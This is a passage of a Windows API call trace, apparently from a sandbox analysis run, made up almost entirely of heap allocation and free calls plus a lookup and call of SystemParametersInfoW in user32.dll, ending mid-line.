0x2a72298 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0248.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0248.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0248.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0248.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0248.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0248.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0248.636] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0248.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0248.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0248.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0248.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0248.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0248.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0248.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0248.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0248.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0248.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0248.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0248.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0248.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0248.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0248.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0248.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0248.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0248.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0248.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0248.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0248.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0248.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0248.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0248.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0248.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0248.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0248.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0248.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0248.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0248.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0248.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0248.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0248.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0248.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0248.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0248.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0248.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0248.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0248.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0248.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0248.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0248.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0248.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0248.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0248.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0248.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0248.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0248.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0248.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0248.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0248.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0248.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0248.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0248.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0248.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0248.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0248.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0248.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0248.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0248.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0248.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0248.645] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0248.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0248.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0248.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0248.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6ea0 [0248.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6ea0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0248.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0248.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0248.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0248.661] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0248.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0248.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0248.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0248.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0248.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0248.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0248.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0248.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0248.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0248.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0248.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0248.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0248.662] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0248.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865f58 [0248.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0248.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0248.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0248.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0248.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0248.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0248.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0248.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0248.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0248.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0248.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0248.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0248.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0248.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0248.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0248.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0248.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0248.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0248.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0248.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0248.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0248.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0248.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0248.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0248.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0248.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0248.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0248.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0248.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0248.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0248.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0248.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0248.798] FreeLibrary (hLibModule=0x76240000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0248.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0248.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38658e0 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0248.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865f58 | out: hHeap=0x2af0000) returned 1 [0248.799] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0248.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0248.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0248.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0248.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0248.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0248.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0248.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0248.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0248.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: 